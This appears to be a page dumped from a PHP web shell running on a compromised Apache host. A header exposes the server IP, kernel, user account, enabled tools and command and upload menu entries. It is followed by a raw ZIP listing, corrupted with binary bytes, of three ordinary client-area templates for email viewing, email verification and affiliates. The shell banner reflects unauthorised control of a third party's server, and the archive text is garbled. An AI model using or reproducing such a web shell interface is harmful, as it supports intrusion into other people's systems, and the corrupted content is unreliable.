Server IP : 213.176.29.180 / Your IP : 13.59.67.189 Web Server : Apache System : Linux 213.176.29.180.hostiran.name 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64 User : webtaragh ( 1001) PHP Version : 8.3.14 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/webtaragh/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
PK F'Z;E�q q viewemail.tplnu �[��� <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>{lang key='clientareaemails'} - {$companyname}</title> {include file="$template/includes/head.tpl"} </head> <body id="popup-backdrop"> <div class="card bg-default"> <div class="card-header"> <h2 class="popup-header-padding"><i class='far fa-envelope'> </i>{$subject}</h2> {if is_array($attachments) && count($attachments) > 0} <div class="popup-header-padding"> {foreach $attachments as $attachedFile} <i class="fal fa-paperclip"></i> {$attachedFile}{if !$attachedFile@last}<br>{/if} {/foreach} </div> {/if} </div> <div class="card-body"> <iframe width="100%" height="380" frameborder="0" srcdoc="{$message|escape}"></iframe> </div> <div class="card-footer text-center"> <button type="button" class="btn btn-primary" onclick="window.close()"> {lang key='closewindow'} </button> </div> </div> </body> </html> PK F'Z@?͉ � user-verify-email.tplnu �[��� <div class="card mw-540 mb-md-4 mt-md-4"> <div class="card-body px-sm-5 py-5 text-center"> {if $success} <h2> <i class="fas fa-check fa-2x text-success"></i><br> {lang key="emailVerification.success"} </h2> {elseif $expired} <h2> <i class="far fa-clock fa-2x text-warning"></i><br> {lang key="emailVerification.expired"} </h2> {if $loggedin} <button class="btn btn-default btn-lg btn-resend-verify-email" data-email-sent="{lang key='emailSent'}" data-error-msg="{lang key='error'}" data-uri="{routePath('user-email-verification-resend')}"> {lang key='resendEmail'} </button> {else} <p>{lang key="emailVerification.loginToRequest"}</p> {/if} {else} <h2> <i class="fas fa-times fa-2x text-danger"></i><br> {lang key="emailVerification.notFound"} </h2> {if !$loggedin} <p>{lang key="emailVerification.loginToRequest"}</p> {/if} {/if} <a href="{routePath('login-index')}" class="btn btn-primary btn-lg mt-4"> {lang key="orderForm.continueToClientArea"} <i class="fa fa-arrow-right"></i> </a> </div> </div> PK F'Z��"k� � affiliates.tplnu �[��� {if $inactive} {include file="$template/includes/alert.tpl" type="danger" msg="{lang key='affiliatesdisabled'}" textcenter=true} {else} {include file="$template/includes/flashmessage.tpl"} {if $withdrawrequestsent} <div class="alert alert-success"> <i class="fas fa-check fa-fw"></i> {lang key='affiliateswithdrawalrequestsuccessful'} </div> {/if} <div class="row"> <div class="col-md-4"> <div class="affiliate-stat affiliate-stat-green alert-warning mb-2"> <i class="fas fa-users"></i> <span>{$visitors}</span> {lang key='affiliatesclicks'} </div> </div> <div class="col-md-4"> <div class="affiliate-stat affiliate-stat-green alert-info mb-2"> <i class="fas fa-shopping-cart"></i> <span>{$signups}</span> {lang key='affiliatessignups'} </div> </div> <div class="col-md-4"> <div class="affiliate-stat affiliate-stat-green alert-success mb-2"> <i class="far fa-chart-bar"></i> <span>{$conversionrate}%</span> {lang key='affiliatesconversionrate'} </div> </div> </div> <div class="card my-3"> <div class="card-body"> <p class="h3">{lang key='affiliatesreferallink'}</p> <input type="text" class="form-control" readonly="readonly" value="{$referrallink}"> </div> </div> <div class="row"> <div class="col-md-8 offset-md-2"> <table class="table table-bordered table-striped table-rounded"> <tr> <td class="text-right">{lang key='affiliatescommissionspending'}:</td> <td><strong>{$pendingcommissions}</strong></td> </tr> <tr> <td class="text-right">{lang key='affiliatescommissionsavailable'}:</td> <td><strong>{$balance}</strong></td> </tr> <tr> <td class="text-right">{lang key='affiliateswithdrawn'}:</td> <td><strong>{$withdrawn}</strong></td> </tr> </table> </div> </div> {if !$withdrawrequestsent} <p class="text-center"> <a href="{$smarty.server.PHP_SELF}?action=withdrawrequest" class="btn btn-lg btn-danger{if !$withdrawlevel} disabled" disabled="disabled{/if}"> <i class="fas fa-university"></i> {lang key='affiliatesrequestwithdrawal'} </a> </p> {if !$withdrawlevel} <p class="text-muted text-center">{lang key="affiliateWithdrawalSummary" amountForWithdrawal=$affiliatePayoutMinimum}</p> {/if} {/if} <h2>{lang key='affiliatesreferals'}</h2> {include file="$template/includes/tablelist.tpl" tableName="AffiliatesList"} <script> jQuery(document).ready(function() { var table = jQuery('#tableAffiliatesList').show().DataTable(); {if $orderby == 'regdate'} table.order(0, '{$sort}'); {elseif $orderby == 'product'} table.order(1, '{$sort}'); {elseif $orderby == 'amount'} table.order(2, '{$sort}'); {elseif $orderby == 'status'} table.order(4, '{$sort}'); {/if} table.draw(); jQuery('#tableLoading').hide(); }); </script> <div class="table-container clearfix"> <table id="tableAffiliatesList" class="table table-list w-hidden"> <thead> <tr> <th>{lang key='affiliatessignupdate'}</th> <th>{lang key='orderproduct'}</th> <th>{lang key='affiliatesamount'}</th> <th>{lang key='affiliatescommission'}</th> <th>{lang key='affiliatesstatus'}</th> </tr> </thead> <tbody> {foreach $referrals as $referral} <tr class="text-center"> <td><span class="w-hidden">{$referral.datets}</span>{$referral.date}</td> <td>{$referral.service}</td> <td data-order="{$referral.amountnum}">{$referral.amountdesc}</td> <td data-order="{$referral.commissionnum}">{$referral.commission}</td> <td><span class='label status status-{$referral.rawstatus|strtolower}'>{$referral.status}</span></td> </tr> {/foreach} </tbody> </table> <div class="text-center" id="tableLoading"> <p><i class="fas fa-spinner fa-spin"></i> {lang key='loading'}</p> </div> </div> {if $affiliatelinkscode} <h2>{lang key='affiliateslinktous'}</h2> <div class="margin-bottom text-center"> {$affiliatelinkscode} </div> {/if} {/if} PK F'Z��K&